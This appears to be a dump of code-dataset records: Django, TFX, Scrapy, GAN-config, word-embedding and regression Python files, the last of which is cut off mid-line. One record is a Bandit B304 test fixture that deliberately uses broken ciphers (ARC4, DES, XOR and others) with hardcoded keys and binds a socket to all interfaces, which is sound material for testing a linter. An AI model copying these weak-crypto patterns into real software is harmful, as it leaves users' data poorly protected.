seq_id
string
text
string
repo_name
string
sub_path
string
file_name
string
file_ext
string
file_size_in_byte
int64
program_lang
string
lang
string
doc_type
string
stars
int64
dataset
string
pt
string
api
list
474451690
from collections import OrderedDict from .models import GoodsChannel def get_categories(): """ 获取商城商品分类菜单 :return: """ # 商品频道及分类菜单 # 使用有序字典保存类别的顺序 # categories = { # 1: { # 组1 # 'channels': [{'id': 1, 'name': 'xxx', 'url': 'yyy'}, {}, {}], # 'sub_cats': [{'id': 1, 'name': 'xxx', 'sub_cats': [{}, {}]}, {}, {}] # }, # 2: { # 组2 # 'channels': [{'id': 1, 'name': 'xxx', 'url': 'yyy'}, {}, {}], # 'sub_cats': [{'id': 1, 'name': 'xxx', 'sub_cats': [{}, {}]}, {}, {}] # } # } # orderedDict记忆插入顺序的字典 categories = OrderedDict() channels = GoodsChannel.objects.order_by('group_id', 'sequence') for channel in channels: # <class goodschannel> id:1, group_id:1, url:http://shouji.jd.com, sequence:1 group_id = channel.group_id # 当前组: 属于目录的第几行 # group_id = 1 if group_id not in categories: # not in categories = {} categories[group_id] = {'channels': [], 'sub_cats': []} # categories = {1: {'channels':[], 'sub_cats': []} cat1 = channel.category # 当前频道的类别对象 # cat1 = <class goods_category> id:1, name:手机, parent_id:none # 追加当前频道 categories[group_id]['channels'].append({ # categories = {1: {'channels':[{'id': 1, 'name': '手机', 'url': 'http://shouji.jd.com'}], 'sub_cats': []} 'id': cat1.id, # 'id': 1 'name': cat1.name, # 'name': 手机 'url': channel.url # 'url': http://shouji.jd.com }) # 构建当前类别的子类别 for cat2 in cat1.goodscategory_set.all(): # cat1.goodscategory_set.all() = [<class goods_category (id: 38, name: 手机通讯, parent_id: 1)>, <class goods_category (id: 39, name: 手机配件, parent_id: 1)>] cat2.sub_cats = [] # cat2 = <class goods_category (id: 38, name: 手机通讯, parent_id: 1, sub_cats: [])> for cat3 in cat2.goodscategory_set.all(): # cat2.goodscategory_set.all() = [<class goods_category (id: 113, name: 手机, parent_id: 38)>, <class goods_category (id: 114, name: 游戏手机, parent_id: 38)>, <class goods_category (id: 115, name: 老人机, parent_id: 38)>, <class goods_category (id: 116, name: 对讲机, parent_id: 38)>] cat2.sub_cats.append(cat3) # cat3 = <class goods_category (id: 113, name: 手机, parent_id: 38)> categories[group_id]['sub_cats'].append(cat2) # categories = {1: {'channels':[{'id': 1, 'name': '手机', 'url': 'http://shouji.jd.com'}], 'sub_cats': [<class goods_category (id: 38, name: 手机通讯, parent_id: 1, sub_cats: [<class goods_category (id: 113, name: 手机, parent_id: 38)>])>]} return categories
null
meiduo_mall/meiduo_mall/apps/goods/utils.py
utils.py
py
3,241
python
en
code
null
code-starcoder2
83
[ { "api_name": "collections.OrderedDict", "line_number": 25, "usage_type": "call" }, { "api_name": "models.GoodsChannel.objects.order_by", "line_number": 26, "usage_type": "call" }, { "api_name": "models.GoodsChannel.objects", "line_number": 26, "usage_type": "attribute" }, { "api_name": "models.GoodsChannel", "line_number": 26, "usage_type": "name" } ]
322181877
# Copyright 2022 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Shared utility functions for ResolverOps.""" from typing import Dict, List, Optional, Sequence from tfx import types # Maps from "span" and "version" to PropertyType.INT. Many ResolverOps require # one or both of these properties, so we define constants here for convenience. SPAN_PROPERTY = {'span': types.artifact.PropertyType.INT} VERSION_PROPERTY = {'version': types.artifact.PropertyType.INT} SPAN_AND_VERSION_PROPERTIES = {**SPAN_PROPERTY, **VERSION_PROPERTY} def get_valid_artifacts( artifacts: Sequence[types.Artifact], property_types: Dict[str, types.artifact.PropertyType]) -> List[types.Artifact]: """Returns artifacts that have the required property names and types.""" valid_artifacts = [] for artifact in artifacts: if artifact.PROPERTIES is None: continue for property_name, property_type in property_types.items(): if (property_name not in artifact.PROPERTIES or artifact.PROPERTIES[property_name].type != property_type): break else: valid_artifacts.append(artifact) return valid_artifacts def filter_artifacts_by_span( artifacts: List[types.Artifact], span_descending: bool, n: int = 1, skip_last_n: int = 0, keep_all_versions: bool = False, min_span: Optional[int] = None, ) -> List[types.Artifact]: """Filters artifacts by their "span" PROPERTY. This should only be used a shared utility for LatestSpan and ConsecutiveSpans. Args: artifacts: The list of Artifacts to filter. span_descending: If true, then the artifacts will be sorted by span in descending order. Else, they will be sorted in ascending order by span. Set to true for LatestSpan, and set to false for ConsecutiveSpans. n: The number of spans to return. If n <= 0, then n is set to the total number of unique spans. skip_last_n: Number of largest spans to skip. For example, if the spans are [1, 2, 3] and skip_last_n=1, then only spans [1, 2] will be considered. keep_all_versions: If true, all versions of the n spans are returned. Else, only the latest version is returned. min_span: Minimum span before which no span will be considered. Returns: The filtered artifacts. """ if not artifacts: return [] # Only keep artifacts with spans >= min_span and account for skip_last_n spans = sorted({a.span for a in artifacts}) if min_span is not None: spans = [s for s in spans if s >= min_span] if skip_last_n: spans = spans[:-skip_last_n] # Sort spans in descending order, if specified. if span_descending: spans = spans[::-1] # Keep n spans, if n is positive. if n > 0: spans = spans[:n] if not spans: return [] artifacts_by_span = {} for artifact in artifacts: artifacts_by_span.setdefault(artifact.span, []).append(artifact) result = [] version_and_id = lambda a: (a.version, a.id) for span in sorted(spans): if keep_all_versions: # span_descending only applies to sorting by span, but version should # always be sorted in ascending order. result.extend(sorted(artifacts_by_span[span], key=version_and_id)) else: # Latest version is defined as the largest version. Ties broken by id. result.append(max(artifacts_by_span[span], key=version_and_id)) return result
null
tfx/dsl/input_resolution/ops/ops_utils.py
ops_utils.py
py
3,948
python
en
code
null
code-starcoder2
83
[ { "api_name": "tfx.types.artifact", "line_number": 22, "usage_type": "attribute" }, { "api_name": "tfx.types", "line_number": 22, "usage_type": "name" }, { "api_name": "tfx.types.artifact", "line_number": 24, "usage_type": "attribute" }, { "api_name": "tfx.types", "line_number": 24, "usage_type": "name" }, { "api_name": "typing.Sequence", "line_number": 30, "usage_type": "name" }, { "api_name": "tfx.types.Artifact", "line_number": 30, "usage_type": "attribute" }, { "api_name": "tfx.types", "line_number": 30, "usage_type": "name" }, { "api_name": "typing.Dict", "line_number": 31, "usage_type": "name" }, { "api_name": "tfx.types.artifact", "line_number": 32, "usage_type": "attribute" }, { "api_name": "tfx.types", "line_number": 32, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 32, "usage_type": "name" }, { "api_name": "tfx.types.Artifact", "line_number": 32, "usage_type": "attribute" }, { "api_name": "typing.List", "line_number": 51, "usage_type": "name" }, { "api_name": "tfx.types.Artifact", "line_number": 51, "usage_type": "attribute" }, { "api_name": "tfx.types", "line_number": 51, "usage_type": "name" }, { "api_name": "typing.Optional", "line_number": 56, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 57, "usage_type": "name" }, { "api_name": "tfx.types.Artifact", "line_number": 57, "usage_type": "attribute" }, { "api_name": "tfx.types", "line_number": 57, "usage_type": "name" } ]
590013784
#number of points inside a quadrilateral from math import sqrt,ceil,floor from fractions import gcd def inside(a,b,c,d): #calculate area area = (c*b+a*b+a*d+d*c)/2 bp = gcd(a,b)+gcd(b,c)+gcd(c,d)+gcd(d,a) return area-bp/2+1 def sol(m): count=0 for a in range(1,m+1): for b in range(1,m+1): for c in range(1,m+1): for d in range(1,m+1): p=inside(a,b,c,d) s=sqrt(p) if ceil(s)==floor(s): count+=1 return count
null
Python/E504/E504/E504.py
E504.py
py
560
python
en
code
null
code-starcoder2
83
[ { "api_name": "fractions.gcd", "line_number": 8, "usage_type": "call" }, { "api_name": "math.sqrt", "line_number": 18, "usage_type": "call" }, { "api_name": "math.ceil", "line_number": 19, "usage_type": "call" }, { "api_name": "math.floor", "line_number": 19, "usage_type": "call" } ]
585452927
##Patterns: B304 from Crypto.Cipher import ARC2 from Crypto.Cipher import ARC4 from Crypto.Cipher import Blowfish from Crypto.Cipher import DES from Crypto.Cipher import XOR from Crypto.Hash import SHA from Crypto import Random from Crypto.Util import Counter from cryptography.hazmat.primitives.ciphers import Cipher from cryptography.hazmat.primitives.ciphers import algorithms from cryptography.hazmat.primitives.ciphers import modes from cryptography.hazmat.backends import default_backend from struct import pack import socket key = b'Sixteen byte key' iv = Random.new().read(ARC2.block_size) ##Warn: B304 cipher = ARC2.new(key, ARC2.MODE_CFB, iv) msg = iv + cipher.encrypt(b'Attack at dawn') key = b'Very long and confidential key' nonce = Random.new().read(16) tempkey = SHA.new(key+nonce).digest() ##Warn: B304 cipher = ARC4.new(tempkey) msg = nonce + cipher.encrypt(b'Open the pod bay doors, HAL') bs = Blowfish.block_size key = b'An arbitrarily long key' iv = Random.new().read(bs) ##Warn: B304 cipher = Blowfish.new(key, Blowfish.MODE_CBC, iv) plaintext = b'docendo discimus ' plen = bs - divmod(len(plaintext),bs)[1] padding = [plen]*plen padding = pack('b'*plen, *padding) msg = iv + cipher.encrypt(plaintext + padding) key = b'-8B key-' nonce = Random.new().read(DES.block_size/2) ctr = Counter.new(DES.block_size*8/2, prefix=nonce) ##Warn: B304 cipher = DES.new(key, DES.MODE_CTR, counter=ctr) plaintext = b'We are no longer the knights who say ni!' msg = nonce + cipher.encrypt(plaintext) key = b'Super secret key' ##Warn: B304 cipher = XOR.new(key) plaintext = b'Encrypt me' msg = cipher.encrypt(plaintext) ##Warn: B304 cipher = Cipher(algorithms.ARC4(key), mode=None, backend=default_backend()) encryptor = cipher.encryptor() ct = encryptor.update(b"a secret message") ##Warn: B304 cipher = Cipher(algorithms.Blowfish(key), mode=None, backend=default_backend()) encryptor = cipher.encryptor() ct = encryptor.update(b"a secret message") ##Warn: B304 cipher = Cipher(algorithms.IDEA(key), mode=None, backend=default_backend()) encryptor = cipher.encryptor() ct = encryptor.update(b"a secret message") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 31137)) s.bind(('192.168.0.1', 8080))
null
docs/multiple-tests/with-config/src/B304.py
B304.py
py
2,238
python
en
code
null
code-starcoder2
83
[ { "api_name": "Crypto.Random.new", "line_number": 19, "usage_type": "call" }, { "api_name": "Crypto.Random", "line_number": 19, "usage_type": "name" }, { "api_name": "Crypto.Cipher.ARC2.block_size", "line_number": 19, "usage_type": "attribute" }, { "api_name": "Crypto.Cipher.ARC2", "line_number": 19, "usage_type": "name" }, { "api_name": "Crypto.Cipher.ARC2.new", "line_number": 21, "usage_type": "call" }, { "api_name": "Crypto.Cipher.ARC2", "line_number": 21, "usage_type": "name" }, { "api_name": "Crypto.Cipher.ARC2.MODE_CFB", "line_number": 21, "usage_type": "attribute" }, { "api_name": "Crypto.Random.new", "line_number": 25, "usage_type": "call" }, { "api_name": "Crypto.Random", "line_number": 25, "usage_type": "name" }, { "api_name": "Crypto.Hash.SHA.new", "line_number": 26, "usage_type": "call" }, { "api_name": "Crypto.Hash.SHA", "line_number": 26, "usage_type": "name" }, { "api_name": "Crypto.Cipher.ARC4.new", "line_number": 28, "usage_type": "call" }, { "api_name": "Crypto.Cipher.ARC4", "line_number": 28, "usage_type": "name" }, { "api_name": "Crypto.Cipher.Blowfish.block_size", "line_number": 31, "usage_type": "attribute" }, { "api_name": "Crypto.Cipher.Blowfish", "line_number": 31, "usage_type": "name" }, { "api_name": "Crypto.Random.new", "line_number": 33, "usage_type": "call" }, { "api_name": "Crypto.Random", "line_number": 33, "usage_type": "name" }, { "api_name": "Crypto.Cipher.Blowfish.new", "line_number": 35, "usage_type": "call" }, { "api_name": "Crypto.Cipher.Blowfish", "line_number": 35, "usage_type": "name" }, { "api_name": "Crypto.Cipher.Blowfish.MODE_CBC", "line_number": 35, "usage_type": "attribute" }, { "api_name": "struct.pack", "line_number": 39, "usage_type": "call" }, { "api_name": "Crypto.Random.new", "line_number": 43, "usage_type": "call" }, { "api_name": "Crypto.Random", "line_number": 43, "usage_type": "name" }, { "api_name": "Crypto.Cipher.DES.block_size", "line_number": 43, "usage_type": "attribute" }, { "api_name": "Crypto.Cipher.DES", "line_number": 43, "usage_type": "name" }, { "api_name": "Crypto.Util.Counter.new", "line_number": 44, "usage_type": "call" }, { "api_name": "Crypto.Util.Counter", "line_number": 44, "usage_type": "name" }, { "api_name": "Crypto.Cipher.DES.block_size", "line_number": 44, "usage_type": "attribute" }, { "api_name": "Crypto.Cipher.DES", "line_number": 44, "usage_type": "name" }, { "api_name": "Crypto.Cipher.DES.new", "line_number": 46, "usage_type": "call" }, { "api_name": "Crypto.Cipher.DES", "line_number": 46, "usage_type": "name" }, { "api_name": "Crypto.Cipher.DES.MODE_CTR", "line_number": 46, "usage_type": "attribute" }, { "api_name": "Crypto.Cipher.XOR.new", "line_number": 52, "usage_type": "call" }, { "api_name": "Crypto.Cipher.XOR", "line_number": 52, "usage_type": "name" }, { "api_name": "cryptography.hazmat.primitives.ciphers.Cipher", "line_number": 57, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.algorithms.ARC4", "line_number": 57, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.algorithms", "line_number": 57, "usage_type": "name" }, { "api_name": "cryptography.hazmat.backends.default_backend", "line_number": 57, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.Cipher", "line_number": 62, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.algorithms.Blowfish", "line_number": 62, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.algorithms", "line_number": 62, "usage_type": "name" }, { "api_name": "cryptography.hazmat.backends.default_backend", "line_number": 62, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.Cipher", "line_number": 67, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.algorithms.IDEA", "line_number": 67, "usage_type": "call" }, { "api_name": "cryptography.hazmat.primitives.ciphers.algorithms", "line_number": 67, "usage_type": "name" }, { "api_name": "cryptography.hazmat.backends.default_backend", "line_number": 67, "usage_type": "call" }, { "api_name": "socket.socket", "line_number": 71, "usage_type": "call" }, { "api_name": "socket.AF_INET", "line_number": 71, "usage_type": "attribute" }, { "api_name": "socket.SOCK_STREAM", "line_number": 71, "usage_type": "attribute" } ]
391835765
import unittest from typing import List from .ds import TreeNode from queue import Queue class Solution(unittest.TestCase): def rightSideView(self, root: TreeNode) -> List[int]: """ Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom. Example: Input: [1,2,3,null,5,null,4] Output: [1, 3, 4] Explanation: 1 <--- / \ 2 3 <--- \ \ 5 4 <--- --- Basic Idea: BFS with level, each level keep last node """ if not root: return [] queue = Queue() queue.put((root, 1)) ret = [] preNode, preLevel = root, 1 while not queue.empty(): node, level = queue.get() if level == preLevel + 1: ret.append(preNode.val) if node.left: queue.put((node.left, level+1)) if node.right: queue.put((node.right, level+1)) preNode, preLevel = node, level ret.append(preNode.val) return ret def testRightView(self): self.assertEqual([1,3,4], self.rightSideView(TreeNode.fromList([1,2,3,None,5,None,4])))
null
src/main/python/binary_tree_right_side_view.py
binary_tree_right_side_view.py
py
1,225
python
en
code
null
code-starcoder2
83
[ { "api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute" }, { "api_name": "ds.TreeNode", "line_number": 7, "usage_type": "name" }, { "api_name": "queue.Queue", "line_number": 29, "usage_type": "call" }, { "api_name": "queue.put", "line_number": 30, "usage_type": "call" }, { "api_name": "queue.empty", "line_number": 34, "usage_type": "call" }, { "api_name": "queue.get", "line_number": 35, "usage_type": "call" }, { "api_name": "queue.put", "line_number": 39, "usage_type": "call" }, { "api_name": "queue.put", "line_number": 41, "usage_type": "call" }, { "api_name": "typing.List", "line_number": 7, "usage_type": "name" }, { "api_name": "ds.TreeNode.fromList", "line_number": 49, "usage_type": "call" }, { "api_name": "ds.TreeNode", "line_number": 49, "usage_type": "name" } ]
265475322
import time from weakref import WeakKeyDictionary from scrapy import signals, log from scrapy.exceptions import NotConfigured from scrapy.exporters import PythonItemExporter from scrapy.http import Request from scrapy.utils.request import request_fingerprint from scrapy.exceptions import ScrapyDeprecationWarning from sh_scrapy import hsref from sh_scrapy.compat import IS_PYTHON2 from sh_scrapy.crawl import ignore_warnings class HubstorageExtension(object): """Extension to write scraped items to HubStorage""" def __init__(self, crawler): self.hsref = hsref.hsref if not self.hsref.enabled: raise NotConfigured self.crawler = crawler self._write_item = self.hsref.job.items.write # https://github.com/scrapy/scrapy/commit/c76190d491fca9f35b6758bdc06c34d77f5d9be9 exporter_kwargs = {'binary': False} if not IS_PYTHON2 else {} with ignore_warnings(category=ScrapyDeprecationWarning): self.exporter = PythonItemExporter(**exporter_kwargs) log.msg("HubStorage: writing items to %s" % self.hsref.job.items.url) @classmethod def from_crawler(cls, crawler): o = cls(crawler) crawler.signals.connect(o.item_scraped, signals.item_scraped) crawler.signals.connect(o.spider_closed, signals.spider_closed) return o def item_scraped(self, item, spider): type_ = type(item).__name__ item = self.exporter.export_item(item) item.setdefault("_type", type_) self._write_item(item) def spider_closed(self, spider, reason): # flush item writer self.hsref.job.items.flush() # update outcome self.hsref.job.metadata.update(close_reason=reason) self.hsref.job.metadata.save() class HubstorageMiddleware(object): def __init__(self): self._seen = WeakKeyDictionary() self.hsref = hsref.hsref def process_spider_input(self, response, spider): parent = response.meta.get('_hsparent') riq = self.hsref.job.requests.add( parent=parent, url=response.url, status=response.status, method=response.request.method, rs=len(response.body), duration=response.meta.get('download_latency', 0) * 1000, ts=time.time() * 1000, fp=request_fingerprint(response.request), ) self._seen[response] = riq def process_spider_output(self, response, result, spider): parent = self._seen.pop(response) for x in result: if isinstance(x, Request): x.meta['_hsparent'] = parent yield x
null
sh_scrapy/extension.py
extension.py
py
2,674
python
en
code
null
code-starcoder2
83
[ { "api_name": "sh_scrapy.hsref.hsref", "line_number": 18, "usage_type": "attribute" }, { "api_name": "sh_scrapy.hsref", "line_number": 18, "usage_type": "name" }, { "api_name": "scrapy.exceptions.NotConfigured", "line_number": 20, "usage_type": "name" }, { "api_name": "sh_scrapy.compat.IS_PYTHON2", "line_number": 25, "usage_type": "name" }, { "api_name": "sh_scrapy.crawl.ignore_warnings", "line_number": 26, "usage_type": "call" }, { "api_name": "scrapy.exceptions.ScrapyDeprecationWarning", "line_number": 26, "usage_type": "name" }, { "api_name": "scrapy.exporters.PythonItemExporter", "line_number": 27, "usage_type": "call" }, { "api_name": "scrapy.log.msg", "line_number": 28, "usage_type": "call" }, { "api_name": "scrapy.log", "line_number": 28, "usage_type": "name" }, { "api_name": "scrapy.signals.item_scraped", "line_number": 33, "usage_type": "attribute" }, { "api_name": "scrapy.signals", "line_number": 33, "usage_type": "name" }, { "api_name": "scrapy.signals.spider_closed", "line_number": 34, "usage_type": "attribute" }, { "api_name": "scrapy.signals", "line_number": 34, "usage_type": "name" }, { "api_name": "weakref.WeakKeyDictionary", "line_number": 54, "usage_type": "call" }, { "api_name": "sh_scrapy.hsref.hsref", "line_number": 55, "usage_type": "attribute" }, { "api_name": "sh_scrapy.hsref", "line_number": 55, "usage_type": "name" }, { "api_name": "time.time", "line_number": 66, "usage_type": "call" }, { "api_name": "scrapy.utils.request.request_fingerprint", "line_number": 67, "usage_type": "call" }, { "api_name": "scrapy.http.Request", "line_number": 74, "usage_type": "argument" } ]
385530762
# ------------------------------------------------------------- # proj: gan-stronomy # file: opts.py # authors: Mark Sabini, Zahra Abdullah, Darrith Phan # desc: File containing all options pertaining to training # ------------------------------------------------------------- import torch import os import util # General parameters SAFETY_MODE = False # Device parameters CUDA = torch.cuda.is_available() DEVICE = 'cuda' if CUDA else 'cpu' FloatTensor = torch.cuda.FloatTensor if CUDA else torch.FloatTensor LongTensor = torch.cuda.LongTensor if CUDA else torch.LongTensor torch.manual_seed(0) torch.cuda.manual_seed_all(0) # Data parameters EMBED_SIZE = 1024 LATENT_SIZE = 100 IMAGE_SIZE = 64 TVT_SPLIT = [49800, 100, 100] TVT_SPLIT_LABELS = ['train', 'val', 'test'] DATASET_NAME = 'data50000' DATA_PATH = os.path.abspath('../temp/%s/data.pkl' % DATASET_NAME) # Training parameters BATCH_SIZE = 64 ADAM_LR = 0.0002 ADAM_B = (0.5, 0.999) NUM_EPOCHS = 91 LAMBDA = 10.0 # Weight of gradient penalty # Model parameters NGF = 64 NDF = 64 CONDITIONAL = True # Run parameters RUN_ID = 64 RUN_COMMENT = 'Type your run comment here!' RUN_PATH = os.path.abspath('../runs/run%d' % RUN_ID) IMG_OUT_PATH = os.path.join(RUN_PATH, 'out') MODEL_PATH = None # None means starting fresh MODEL_OUT_PATH = os.path.join(RUN_PATH, 'models') INTV_PRINT_LOSS = 1 INTV_SAVE_IMG = 1 INTV_SAVE_MODEL = 10 NUM_UPDATE_D = 3
null
code/opts.py
opts.py
py
1,412
python
en
code
null
code-starcoder2
83
[ { "api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute" }, { "api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute" }, { "api_name": "torch.FloatTensor", "line_number": 17, "usage_type": "attribute" }, { "api_name": "torch.cuda", "line_number": 18, "usage_type": "attribute" }, { "api_name": "torch.LongTensor", "line_number": 18, "usage_type": "attribute" }, { "api_name": "torch.manual_seed", "line_number": 19, "usage_type": "call" }, { "api_name": "torch.cuda.manual_seed_all", "line_number": 20, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 20, "usage_type": "attribute" }, { "api_name": "os.path.abspath", "line_number": 29, "usage_type": "call" }, { "api_name": "os.path", "line_number": 29, "usage_type": "attribute" }, { "api_name": "os.path.abspath", "line_number": 46, "usage_type": "call" }, { "api_name": "os.path", "line_number": 46, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 47, "usage_type": "call" }, { "api_name": "os.path", "line_number": 47, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 49, "usage_type": "call" }, { "api_name": "os.path", "line_number": 49, "usage_type": "attribute" } ]
86552622
from __future__ import print_function, division from future.utils import iteritems from builtins import range import json import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.utils import shuffle from sklearn.manifold import TSNE from sklearn.decomposition import TruncatedSVD, PCA, KernelPCA from sklearn.feature_extraction.text import TfidfTransformer from datetime import datetime import os import sys initial_dir = os.getcwd() os.chdir('../course_repo/machine_learning_examples/rnn_class') from util import get_wikipedia_data from brown import get_sentences_with_word2idx_limit_vocab, get_sentences_with_word2idx # os.chdir(initial_dir) sentences, word2idx = get_wikipedia_data(n_files = 3, n_vocab = 2000, by_paragraph = True) # build term document matrix: V = len(word2idx) N = len(sentences) # create raw counts: A = np.zeros((V,N)) j = 0 for sentence in sentences: for i in sentence: A[i, j] += 1 j+=1 transformer = TfidfTransformer() A = transformer.fit_transform(A.T).T # TSNE requires a dense array (TSNE is a dimension reduction algorithm) A = A.toarray() # map back to word in plot idx2word = {v:k for k, v in iteritems(word2idx)} tsne = TSNE() Z = tsne.fit_transform(A) Z_df = pd.DataFrame(Z) Z_df['word'] = Z_df.index.map(lambda x: idx2word[x]) Z_df.columns = ['x','y','word'] # look at some words in the space: small_subset_words = ['king', 'man', 'woman','france', 'paris', 'rome', 'italy'] small_subset_indices = [word2idx[word] for word in small_subset_words] Z_small = Z[small_subset_indices] plt.scatter(Z_small[:,0], Z_small[:,1]) for i in range(V): if i in small_subset_indices: try: plt.annotate(s=idx2word[i].encode("utf8").decode("utf8"), xy=(Z[i,0], Z[i,1])) except: print("bad string:", idx2word[i]) plt.draw() # look at a random small section of the plot: def random_section(Z_df = Z_df): random_index = np.random.choice(range(V)) idx2word[random_index] feature = Z[random_index] Z_df['distance'] = Z_df.index.map(lambda x: (Z[x][0]- feature[0])**2 + (Z[x][1]- feature[1])**2) Z_df = Z_df.sort_values(by = 'distance').reset_index(drop = False) small_df = Z_df.iloc[0:9] plt.scatter(small_df['x'], small_df['y']) for i in range(len(small_df)): plt.annotate(small_df['word'][i], xy=(small_df['x'][i], small_df['y'][i])) plt.draw() random_section() # find a word analogy: # we want to solve: word_diff[0] - word_diff[1] = word_diff[2] - ? def analogy_finder(word_vec, Z_df = Z_df): indices = [word2idx[word] for word in word_vec] new_vec = Z[indices][2] + Z[indices][1]- Z[indices][0] Z_df['distance'] = Z_df.index.map(lambda x: (Z[x][0]- new_vec[0])**2 + (Z[x][1]- new_vec[1])**2) new = Z_df.sort_values(by = 'distance').reset_index(drop = False)['index'][0] return(idx2word[new]) analogy_finder(['king', 'queen', 'man']) analogy_finder(['spain', 'spanish', 'england']) analogy_finder(['spain', 'madrid', 'italy']) analogy_finder(['italy', 'rome', 'italy'])
null
lecture_8.py
lecture_8.py
py
3,078
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.getcwd", "line_number": 17, "usage_type": "call" }, { "api_name": "os.chdir", "line_number": 18, "usage_type": "call" }, { "api_name": "util.get_wikipedia_data", "line_number": 25, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 32, "usage_type": "call" }, { "api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 41, "usage_type": "call" }, { "api_name": "future.utils.iteritems", "line_number": 48, "usage_type": "call" }, { "api_name": "sklearn.manifold.TSNE", "line_number": 50, "usage_type": "call" }, { "api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.scatter", "line_number": 63, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name" }, { "api_name": "builtins.range", "line_number": 64, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.annotate", "line_number": 67, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.draw", "line_number": 70, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name" }, { "api_name": "numpy.random.choice", "line_number": 75, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 75, "usage_type": "attribute" }, { "api_name": "builtins.range", "line_number": 75, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.scatter", "line_number": 85, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name" }, { "api_name": "builtins.range", "line_number": 87, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.annotate", "line_number": 88, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.draw", "line_number": 90, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name" } ]
651719991
#!/usr/bin/env python """Functions for streamlining analysis.""" # Imports from collections import defaultdict, Sequence, namedtuple import functools import itertools import concurrent.futures as futures import pandas as pd import numpy as np import statsmodels.formula.api as smf import statsmodels import munch import patsy from crunchers import parallel as putils from crunchers import ipython_info if ipython_info(): from tqdm import tqdm_notebook as tqdm else: from tqdm import tqdm # Metadata __author__ = "Gus Dunn" __email__ = "[email protected]" def tree(): return defaultdict(tree) def report_logitreg(formula, data, verbose=True, disp=1): """Fit logistic regression, print a report, and return the fit object.""" y, X = patsy.dmatrices(formula, data=data, return_type='dataframe') results = smf.Logit(endog=y, exog=X).fit(disp=disp) # results = smf.logit(formula, data=data).fit() summary = results.summary() margeff = results.get_margeff().summary() if verbose: report = """\n{summary}\n\n\n{margeff}\n""".format(summary=summary,margeff=margeff) print(report) return results def report_glm(formula, data, verbose=True, **kwargs): """Fit GLM, print a report, and return the fit object.""" results = smf.glm(formula, data=data, **kwargs).fit(disp=False, **kwargs) summary = results.summary() if verbose: report = """\n{summary}\n""".format(summary=summary) print(report) return results def report_ols(formula, data, fit_regularized=False, L1_wt=1, refit=False, **kwargs): """Fit OLS regression, print a report, and return the fit object.""" RegressionResultsWrapper = statsmodels.regression.linear_model.RegressionResultsWrapper # parse formula string into design matrix y, X = patsy.dmatrices(formula, data=data, return_type='dataframe') if fit_regularized: # Does not wrap in RegressionResultsWrapper automatically when using elastic_net results = RegressionResultsWrapper(smf.OLS(endog=y, exog=X,).fit_regularized(start_params=None, L1_wt=L1_wt, refit=refit, **kwargs)) else: results = smf.OLS(endog=y, exog=X,).fit(**kwargs) return results def report_rlm(formula, data, verbose=True, **kwargs): """Fit RLM, print a report, and return the fit object.""" results = smf.rlm(formula, data=data, **kwargs).fit(**kwargs) summary = results.summary() if verbose: report = """\n{summary}\n""".format(summary=summary) print(report) return results def do_regression(data, y_var, X_ctrls=None, X_hyp=None, kind='OLS', **kwargs): """Provide a further abstracted way to build and run multiple types of regressions. data (pd.DataFrame): data table to use when retrieving the column headers y_var (str): column header of the outcome variable X_ctrls (str): formula specification of the "boring" variables "column_header_1 + column_header_2"... X_hyp (str): formula specification of the "interesting" variables "column_header_1 + column_header_2"... kind (str): the type of regression to run `kind in ['GLM','OLS','RLM'] == True` """ assert (X_ctrls is not None) or (X_hyp is not None) if X_hyp is not None: X_hyp = ' + {X_hyp}'.format(X_hyp=X_hyp) else: X_hyp = '' if X_ctrls is None: X_ctrls = '' formula = '{y_var} ~ {X_ctrls}{X_hyp}'.format(y_var=y_var, X_ctrls=X_ctrls, X_hyp=X_hyp) regs = munch.Munch() regs.GLM = report_glm regs.OLS = report_ols regs.RLM = report_rlm regs.LOGIT = report_logitreg return regs[kind](formula=formula, data=data, **kwargs) def build_regression_models_grid(X_hyps_dicts, ctrl_coefs_dicts, outcomes_dicts): grid = munch.Munch() combos = itertools.product(X_hyps_dicts.keys(),ctrl_coefs_dicts.keys(),outcomes_dicts.keys()) for model_vars in tqdm(combos, 